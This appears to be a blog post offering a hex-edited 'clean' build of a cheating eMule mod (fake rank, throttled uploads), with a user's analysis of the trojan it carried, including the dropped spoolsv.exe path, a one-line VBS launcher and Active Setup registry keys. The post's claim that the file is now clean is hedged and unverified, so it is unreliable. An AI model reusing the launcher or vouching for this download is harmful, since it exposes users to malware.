eMule 0.48a Final Fight Gold [Clean]
eMule v0.48a Final Fight Gold
0.48a eMule Final Fight Gold (5) based on
Sivka 0.48a v18a1-alpha
Modded by Ruffy
15-May-2008
-Fake Rank
-Queue Size Verändert
-Max Queue Rank beim Download erhöht
-Ändern der Upload – Slotanzahl
-Upload wurde manipuliert, (Man kann es auf 1 setzen ohne das sich der Down-Speed ändert) Upload manipulated, it can be set to 1 it will not affect the Down-Speed
-Remove Ratio
-Remove Wizard
-Remove Help
-Added new Icons
Code analyse:
Agent.ECJH
Malware to: Documents and Settings\YourWindowsLogonName\Application Data\Microsoft\spoolsv.exe
and
cfgmgr.vbs
with content:
Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.Run Chr(34) & "C:\Documents and Settings\Nata...\Application Data\Microsoft\spoolsv.exe" & Chr(34)
was add the registry entries: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}
result still not clean but the virus is possible eliminated and can not more start nor produce
http://www.virustotal.com/analisis/dde25155980c21598c035c52581fc250
I found: HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}
Download: IT SHOULD BE CLEAN NOW OR THE TROJAN IS NOW DESTROYED
eMule 0.48a Final Fight Gold -clean.zip
2.72 MB - Hexedited
0.48a eMule Final Fight Gold (5) based on
Sivka 0.48a v18a1-alpha
Modded by Ruffy
15-May-2008
-Fake Rank
-Queue Size Verändert
-Max Queue Rank beim Download erhöht
-Ändern der Upload – Slotanzahl
-Upload wurde manipuliert, (Man kann es auf 1 setzen ohne das sich der Down-Speed ändert) Upload manipulated, it can be set to 1 it will not affect the Down-Speed
-Remove Ratio
-Remove Wizard
-Remove Help
-Added new Icons
Code analyse:
Agent.ECJH
Malware to: Documents and Settings\YourWindowsLogonName\Application Data\Microsoft\spoolsv.exe
and
cfgmgr.vbs
with content:
Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.Run Chr(34) & "C:\Documents and Settings\Nata...\Application Data\Microsoft\spoolsv.exe" & Chr(34)
was add the registry entries: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}
result still not clean but the virus is possible eliminated and can not more start nor produce
http://www.virustotal.com/analisis/dde25155980c21598c035c52581fc250
I found: HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}
Download: IT SHOULD BE CLEAN NOW OR THE TROJAN IS NOW DESTROYED
eMule 0.48a Final Fight Gold -clean.zip
2.72 MB - Hexedited
4 comments:
Kaspersky 2009,Spybot,A-Squared
nothing found...
The Reg Key i don't found.
Sorry my english :-((
Don;t know most c++ binaries with coded not attached or things with binder done not shown in the most AV's.
all emules before almost found inside exe with VBA32
http://vba32.de/demo/content/view/15/31/
maybe cause of:
http://en.wikipedia.org/wiki/Vba32_AntiVirus
the advantage of this AV:
- Usage of the “Delta-patch” technology
- Heuristic analyzer and technology of recognition of viruses MalwareScope, considerably improve the efficiency of new malicious programs detection
- Dynamic code translation processor emulator effectively handles complex-polymorphous viruses, packers and cryptors
... and many more
Scan bulk exe done with VC++ with
Virus Block Ada 32
http://vba32.de/anonymous/pub/Vba32Scan.zip
newer version here:
ftp://anti-virus.by/pub/Vba32Scan.zip
scanner only
It's really clean now. Tested in sandbox and vp
Post a Comment
We would appreciate if you as readers of our blog, show us some feedback by signing up to this site with Friend Connect.
This will encourage us to publish updates in the future.